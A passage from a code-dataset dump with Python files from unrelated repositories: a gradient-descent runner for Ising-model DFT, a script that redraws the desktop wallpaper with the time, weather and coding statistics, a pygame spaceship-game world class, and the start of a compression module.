{"api_name": "krpsim.parsing.Process", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 215, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 232, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 250, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 124, "usage_type": "name"}]} +{"seq_id": "72829752193", "text": "from src.gradient_descent import GradientDescent\nimport argparse\nimport torch\nimport numpy as np\nfrom src.training.utils import from_txt_to_bool\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"--n_instances\", type=int, help=\"# of target samples (default=100)\", default=100\n)\nparser.add_argument(\n \"--loglr\", type=int, help=\"value of the log(lr) (default=-1)\", default=-1\n)\nparser.add_argument(\n \"--cut\", type=int, help=\"value of gradient cutoff (deprecated)\", default=128\n)\nparser.add_argument(\n \"--logdiffsoglia\",\n type=int,\n help=\"value of the early stopping thrashold (default=-5)\",\n default=-5,\n)\nparser.add_argument(\n \"--n_ensambles\",\n type=int,\n help=\"# of initial configuration (default=1)\",\n default=1,\n)\nparser.add_argument(\n \"--target_path\",\n type=str,\n help=\"name of the target dataset (default='data/dataset/valid_sequential_64_l_0_h_15000_n.npz')\",\n default=\"data/dataset/valid_sequential_64_l_0_h_15000_n.npz\",\n)\nparser.add_argument(\n \"--init_path\",\n type=str,\n help=\"name of the init dataset (default='data/dataset/valid_sequential_64_l_0_h_150000_n.npz')\",\n default=\"data/dataset/train_sequential_64_l_0_h_150000_n.npz\",\n)\n\n\nparser.add_argument(\n \"--model_name\",\n type=str,\n help=\"name of model (default='ising_model_cnn_h_uniform_30_hc_3_ks_2_ps')\",\n default=\"ising_model_cnn_30_hc_3_ks_2_ps\",\n)\nparser.add_argument(\n \"--run_name\",\n type=str,\n help=\"name of the run (default='ising_model_cnn_h_uniform_30_hc_3_ks_2_ps')\",\n default=\"h_3.0_ising_model_unet_gelu_3_layers_30_hc_ks_2_ps\",\n)\nparser.add_argument(\n \"--epochs\", type=int, help=\"# of epochs (default=10001)\", default=10001\n)\nparser.add_argument(\n \"--variable_lr\",\n type=str,\n help=\"if it is true implement a dynamic learning rate (default=True)\",\n default=\"False\",\n)\nparser.add_argument(\n \"--early_stopping\",\n type=str,\n help=\"if it is true implement the early stopping (default=False)\",\n default=\"False\",\n)\nparser.add_argument(\"--L\", type=int, help=\"size of the system (default=14)\", default=14)\nparser.add_argument(\n \"--resolution\", type=int, help=\"resolution of the system (default=64)\", default=64\n)\nparser.add_argument(\n \"--final_lr\",\n type=float,\n help=\"resolution of the system (default=10**-6)\",\n default=10 ** -6,\n)\nparser.add_argument(\n \"--num_threads\",\n type=int,\n help=\"number of threads for the torch process (default=1)\",\n default=1,\n)\nparser.add_argument(\n \"--device\",\n type=str,\n help=\"the threshold difference for the early stopping (default=device available)\",\n default=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n)\nparser.add_argument(\n \"--seed\",\n type=int,\n help=\"seed for numpy and pytorch (default=42)\",\n default=42,\n)\n\nparser.add_argument(\n \"--long_range\",\n type=bool,\n help=\"if True, use the long range option in the energy (default=False)\",\n action=argparse.BooleanOptionalAction,\n)\n\n\nargs = parser.parse_args()\n\nn_init = np.load(args.init_path)[\"density\"]\n\ngd = GradientDescent(\n 
n_instances=args.n_instances,\n run_name=args.run_name,\n loglr=args.loglr,\n n_init=n_init,\n cut=args.cut,\n n_ensambles=args.n_ensambles,\n model_name=args.model_name,\n target_path=args.target_path,\n epochs=args.epochs,\n variable_lr=from_txt_to_bool(args.variable_lr),\n early_stopping=from_txt_to_bool(args.early_stopping),\n L=args.L,\n resolution=args.resolution,\n final_lr=args.final_lr,\n num_threads=args.num_threads,\n device=args.device,\n seed=args.seed,\n logdiffsoglia=args.logdiffsoglia,\n long_range=args.long_range,\n)\n\ngd.run()\n", "repo_name": "emacosta95/dft_for_ising", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "argparse.BooleanOptionalAction", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 110, "usage_type": "call"}, {"api_name": "src.gradient_descent.GradientDescent", "line_number": 112, "usage_type": "call"}, {"api_name": "src.training.utils.from_txt_to_bool", "line_number": 122, "usage_type": "call"}, {"api_name": "src.training.utils.from_txt_to_bool", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "74712109315", "text": "import os,random\nfrom this import d\nfrom PIL import Image, ImageDraw, ImageFont\nimport datetime\nimport subprocess\n\nwindow = [1920, 1080]\n\ndef get_wind_dir(angle):\n dir = \"W\"\n if (angle > 0):\n dir = \"W\"\n if (angle > 23):\n dir = \"SW\"\n if (angle > 68):\n dir = \"S\"\n if (angle > 113):\n dir = \"SE\"\n if (angle > 158):\n dir = \"E\"\n if (angle > 203):\n dir = \"NE\"\n if (angle > 248):\n dir = \"N\"\n if (angle > 293):\n dir = \"NW\"\n if (angle > 338):\n dir = \"W\"\n return dir\n\n\ndef get_time(time : str):\n if (time < 10):\n return \"0\" + str(time)\n else:\n return str(time)\n\nnow = datetime.datetime.now()\n\nfile = random.choice(os.listdir(\"/home/mbecel/scripts/pimp_bg/images/\"))\nos.system(f\"cp ~/scripts/pimp_bg/images/{file} ~/scripts/pimp_bg/bg.png\")\nbackground = Image.open(\"/home/mbecel/scripts/pimp_bg/bg.png\")\nfont_path = \"/home/mbecel/scripts/pimp_bg/Timeless.ttf\"\n\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/getplace'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\n\n\n# Show hour\nfont = ImageFont.truetype(font=font_path, size=110)\nImageDraw.Draw(background).text((1450, 40), f\"{get_time(now.hour)}:{get_time(now.minute)}\", (255, 255, 255), font=font)\n\n# Show Info ip\nfont = ImageFont.truetype(font=font_path, size=18)\nImageDraw.Draw(background).text((1750, 50), f\"{stdout.decode('UTF-8')}\", (255, 255, 255), font=font)\n\n# Show tiempo\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/gettemp'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\nprint(stdout.decode('ASCII').split(\" \"))\nlist_temp = stdout.decode('ASCII').split(\" \")\nout = subprocess.Popen(['/bin/bash', '/home/mbecel/scripts/pimp_bg/scripts/getwaka'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\nstdout, stderr = out.communicate()\nlist_waka = 
stdout.decode('ASCII').split(\" \")\nprint(stdout.decode('ASCII'))\n\nif (list_temp[0] != \"No\"):\n font = ImageFont.truetype(font=font_path, size=60)\n ImageDraw.Draw(background).text((1745, 200), f\"{list_temp[0]}°C\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=18)\n ImageDraw.Draw(background).text((1500, 190), f\"Rain: {list_temp[1]}mm\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 210), f\"Cloud: {list_temp[2]}%\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 230), f\"Wind speed: {list_temp[3]} km/h\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1500, 250), f\"Wind direction: {list_temp[4]}° ({get_wind_dir(int(list_temp[4]))})\", (255, 255, 255), font=font)\n\n ImageDraw.Draw(background).line([(1730, 10), (1730, 300)], fill=(255, 255, 255), width=10)\n ImageDraw.Draw(background).line([(1450, 170), (1900, 170)], fill=(255, 255, 255), width=10)\n\nif (list_waka[0] != \"No\"):\n today = int(list_waka[2]) * 60 + int(list_waka[3])\n total = int(list_waka[4]) * 60 + int(list_waka[5])\n percentage = round((today / total) * 100)\n font = ImageFont.truetype(font=font_path, size=22)\n ImageDraw.Draw(background).text((1520, 790), f\"Coding time today:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1760, 790), f\"This week:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1520, 950), f\"Today status:\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1760, 950), f\"Average:\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=50)\n ImageDraw.Draw(background).text((1490, 850), f\"{list_waka[2]}h {list_waka[3]}min\", (255, 255, 255), font=font)\n font = ImageFont.truetype(font=font_path, size=38)\n ImageDraw.Draw(background).text((1520, 1030), f\"({percentage}%)\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1750, 855), f\"{list_waka[0]}h {list_waka[1]}min\", (255, 255, 255), font=font)\n ImageDraw.Draw(background).text((1750, 1015), f\"{list_waka[4]}h {list_waka[5]}min\", (255, 255, 255), font=font)\n\n if (percentage == 100):\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(10, 255, 10), width=20)\n elif (percentage > 100):\n if (percentage > 200):\n mx = 250\n else:\n mx = ((((percentage - 100) * 250) / 100))\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(10, 255, 10), width=20)\n ImageDraw.Draw(background).line([(1460, 1020), (1460 + mx, 1020)], fill=(10, 255, 10), width=20)\n elif (percentage <= 0):\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(255, 10, 10), width=20)\n else:\n ImageDraw.Draw(background).line([(1460, 1000), (1710, 1000)], fill=(255, 10, 10), width=20)\n ImageDraw.Draw(background).line([(1460, 1000), (1460 + ((percentage * 250) / 100), 1000)], fill=(10, 255, 10), width=20)\n\n ImageDraw.Draw(background).line([(1730, 780), (1730, 1070)], fill=(255, 255, 255), width=10)\n ImageDraw.Draw(background).line([(1450, 940), (1900, 940)], fill=(255, 255, 255), width=10)\n\n\n\n\nbackground.save(\"/home/mbecel/scripts/pimp_bg/bg.png\")\n\nbackground.close()\nos.system(\"cp /home/mbecel/scripts/pimp_bg/bg.png /home/mbecel/scripts/pimp_bg/current_bg.png\")\nos.system(f'gsettings set org.gnome.desktop.background picture-uri \"file:///home/mbecel/scripts/pimp_bg/current_bg.png\"')", "repo_name": "maelbecel/Usefull-scripts", "sub_path": "pimp_bg/pimp_bg.py", "file_name": "pimp_bg.py", "file_ext": "py", "file_size_in_byte": 5422, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 40, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 45, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 55, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 68, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 71, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 71, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 74, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 74, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 84, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", 
"line_number": 84, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 85, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 86, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 90, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 91, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 91, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 92, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 92, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 93, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 93, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 96, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 102, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 102, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 103, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 103, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 105, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 105, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 107, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 108, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 108, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 110, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 110, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 111, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 111, "usage_type": "name"}, {"api_name": "os.system", "line_number": 119, "usage_type": "call"}, {"api_name": "os.system", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "4123838780", "text": "import copy\nimport random\nimport math\nimport threading\nimport pygame\nfrom pygame.locals import *\nfrom src.Constants import *\nfrom src.classes.Stone import Stone\nfrom src.classes.EnemySpaceship import EnemySpaceship\nfrom src.classes.Explosion import Explosion\nfrom src.classes.SpaceshipWreckage import SpaceshipWreckage\nfrom src.classes.BlueDust import BlueDust\nfrom src.classes.GreenDust import GreenDust\nfrom src.classes.TexturedObject import TexturedObject\nfrom src.classes.SoundManager import SOUND_MANAGER\n\npygame.init()\n\nclass World(TexturedObject):\n def __init__(self, player, spaceship = None):\n self.pos = WORLD_POS\n self.size = WORLD_SIZE\n TexturedObject.__init__(self, pos = self.pos, size = self.size, background = WORLD_BACKGROUND)\n self.background 
= copy.copy(self.image)\n self.all_sprites_lock = threading.Lock()\n self.player = player\n self.spaceship = spaceship\n self.stones = pygame.sprite.LayeredDirty()\n self.enemy_spaceships = pygame.sprite.LayeredDirty()\n self.spaceship_wreckages = pygame.sprite.LayeredDirty()\n self.shots = pygame.sprite.LayeredDirty()\n self.effects = pygame.sprite.LayeredDirty()\n self.dust = pygame.sprite.LayeredDirty()\n self.all_objects = pygame.sprite.LayeredDirty()\n global SOUND_MANAGER\n SOUND_MANAGER.load_sound(EXPLOSION_SOUND, EXPLOSION_VOLUME)\n\n def set_spaceship(self, spaceship):\n if not self.spaceship is None:\n self.spaceship.kill()\n self.spaceship = spaceship\n self.all_sprites_lock.acquire()\n self.all_objects.add(spaceship, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def generate_stone(self):\n pos = pygame.math.Vector2( random.randint( 0, self.rect.width -50), 0)\n stone = Stone( pos = pos , level = random.randint(1, MAX_STONE_LEVEL) )\n if not pygame.sprite.spritecollideany(stone, self.stones):\n self.add_stone( stone )\n \n def generate_explosion(self, pos):\n global SOUND_MANAGER\n SOUND_MANAGER.play_sound( EXPLOSION_SOUND )\n explosion = Explosion()\n explosion.rect.center = pos\n self.add_explosion(explosion) \n \n def generate_dust(self, pos, level):\n if random.randint(1, int(1 / CHANCE_GREEN_DUST[level])) == 1:\n dust = GreenDust()\n else:\n dust = BlueDust()\n dust.set_pos(pygame.math.Vector2(pos))\n self.add_dust(dust)\n \n def generate_enemy_spaceship(self):\n pos = pygame.math.Vector2( random.randint( 0, self.rect.width -50), 0)\n enemy_spaceship = EnemySpaceship( pos = pos )\n if not pygame.sprite.spritecollideany(enemy_spaceship, self.enemy_spaceships):\n self.add_enemy_spaceship( enemy_spaceship )\n \n def generate_spaceship_wreckage(self, center):\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(0, 0.5)) ])\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(0, 1.5)) ]) \n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(-1, 1.5)) ])\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(1, 1.5)) ])\n \n def add_stone(self, stone):\n self.stones.add(stone, layer = STONE_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(stone, layer = STONE_LAYER)\n self.all_sprites_lock.release()\n \n def add_shot(self, shots):\n for shot in shots:\n self.shots.add(shot, layer = SHOT_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(shot, layer = SHOT_LAYER)\n self.all_sprites_lock.release()\n \n def add_explosion(self, explosion):\n self.effects.add(explosion, layer = EFFECT_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(explosion, layer = EFFECT_LAYER)\n self.all_sprites_lock.release()\n \n def add_spaceship_wreckage(self, wreckage):\n self.spaceship_wreckages.add( wreckage )\n self.all_sprites_lock.acquire()\n self.all_objects.add(wreckage, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def add_dust(self, dust):\n self.dust.add(dust, layer = DUST_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(dust, layer = DUST_LAYER)\n self.all_sprites_lock.release()\n \n def add_enemy_spaceship(self, enemy_spaceship):\n self.enemy_spaceships.add(enemy_spaceship)\n 
self.all_sprites_lock.acquire()\n self.all_objects.add(enemy_spaceship, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def clear(self):\n self.all_sprites_lock.acquire()\n self.all_objects.clear(self.image, self.background)\n self.all_sprites_lock.release()\n \n def update(self, frame_time):\n old_rects = []\n for sprite in self.dust:\n sprite.follow_pos(self.spaceship.rect.center)\n self.all_sprites_lock.acquire()\n for sprite in self.all_objects.sprites():\n old_rects += sprite.update(frame_time)\n self.all_sprites_lock.release()\n if self.spaceship.rect.left < 0:\n self.spaceship.rect.left = 0\n if self.spaceship.rect.right > self.rect.width:\n self.spaceship.rect.right = self.rect.width\n \n for effect in self.effects.sprites():\n if effect.counter >= effect.max_counter:\n effect.kill()\n \n self.all_sprites_lock.acquire()\n for sprite in self.all_objects.sprites():\n if not self.rect.colliderect(sprite.rect):\n sprite.kill()\n self.all_sprites_lock.release()\n return old_rects\n \n\t# does not collide the other object groups if the spaceship collides with stones\n def collide_objects(self):\n for group in [self.stones, self.enemy_spaceships, self.spaceship_wreckages]:\n if pygame.sprite.spritecollide(self.spaceship, group, True):\n return self.spaceship.handle_collision()\n else:\n for group in (self.shots, self.spaceship_wreckages):\n exploding_stones = pygame.sprite.groupcollide(self.stones, group, True, True)\n for stone in exploding_stones.keys():\n self.generate_explosion(stone.rect.center)\n self.generate_dust(stone.rect.center, stone.level)\n \n for group in (self.shots, self.spaceship_wreckages):\n exploding_enemy_spaceships = pygame.sprite.groupcollide(self.enemy_spaceships, group, True, True)\n for enemy_spaceship in exploding_enemy_spaceships.keys():\n self.generate_explosion(enemy_spaceship.rect.center)\n self.generate_spaceship_wreckage(enemy_spaceship.rect.center)\n \n exploding_wreckages = pygame.sprite.groupcollide(self.spaceship_wreckages, self.shots, True, True)\n for exploding_wreckage in exploding_wreckages.keys():\n self.generate_explosion(exploding_wreckage.rect.center)\n \n collected_dust = pygame.sprite.spritecollide(self.spaceship, self.dust, True)\n for dust in collected_dust:\n self.player.collect_dust(dust)\n self.spaceship.collect_dust(dust)\n return False\n\n def draw(self, screen):\n self.all_sprites_lock.acquire()\n drawn_rects = self.all_objects.draw(self.image)\n self.all_sprites_lock.release()\n for i in range(len(drawn_rects)):\n pos = [ drawn_rects[i].left + self.rect.left , drawn_rects[i].top + self.rect.top ]\n screen.blit(self.image, pos, drawn_rects[i])\n drawn_rects[i].topleft = pos\n return drawn_rects\n\n\n# pygame.sprite.groupcollide(group1, group2, dokill1, dokill2, collided = None)\n# collided = collide_mask -> True / False\n#pygame.sprite.collide_mask(sprite1, sprite2) -> point / None\n", "repo_name": "minacode/Spaceship", "sub_path": "src/classes/World.py", "file_name": "World.py", "file_ext": "py", "file_size_in_byte": 8301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "src.classes.TexturedObject.TexturedObject", "line_number": 19, "usage_type": "name"}, {"api_name": "src.classes.TexturedObject.TexturedObject.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "src.classes.TexturedObject.TexturedObject", "line_number": 23, "usage_type": "name"}, {"api_name": 
"copy.copy", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 34, "usage_type": "attribute"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER.load_sound", "line_number": 36, "usage_type": "call"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER", "line_number": 36, "usage_type": "name"}, {"api_name": "pygame.math.Vector2", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 47, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 47, "usage_type": "call"}, {"api_name": "src.classes.Stone.Stone", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER.play_sound", "line_number": 54, "usage_type": "call"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER", "line_number": 54, "usage_type": "name"}, {"api_name": "src.classes.Explosion.Explosion", "line_number": 55, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "src.classes.GreenDust.GreenDust", "line_number": 61, "usage_type": "call"}, {"api_name": "src.classes.BlueDust.BlueDust", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 68, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "src.classes.EnemySpaceship.EnemySpaceship", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 70, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 74, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 75, 
"usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 76, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "26158836584", "text": "\"\"\"\"Compressor module. Handles the compression of files.\"\"\"\n\n###############################################################################\n# IMPORTS ########################################################### IMPORTS #\n###############################################################################\n\n# Standard library\nimport dataclasses\nimport logging\nimport pathlib\nimport traceback\n\n\n# Installed\nimport zstandard as zstd\n\n# Own modules\nfrom dds_cli import FileSegment\n\n###############################################################################\n# START LOGGING CONFIG ################################# START LOGGING CONFIG #\n###############################################################################\n\nLOG = logging.getLogger(__name__)\n\n###############################################################################\n# CLASSES ########################################################### CLASSES #\n###############################################################################\n\n\nclass CompressionMagic:\n \"\"\"Compression 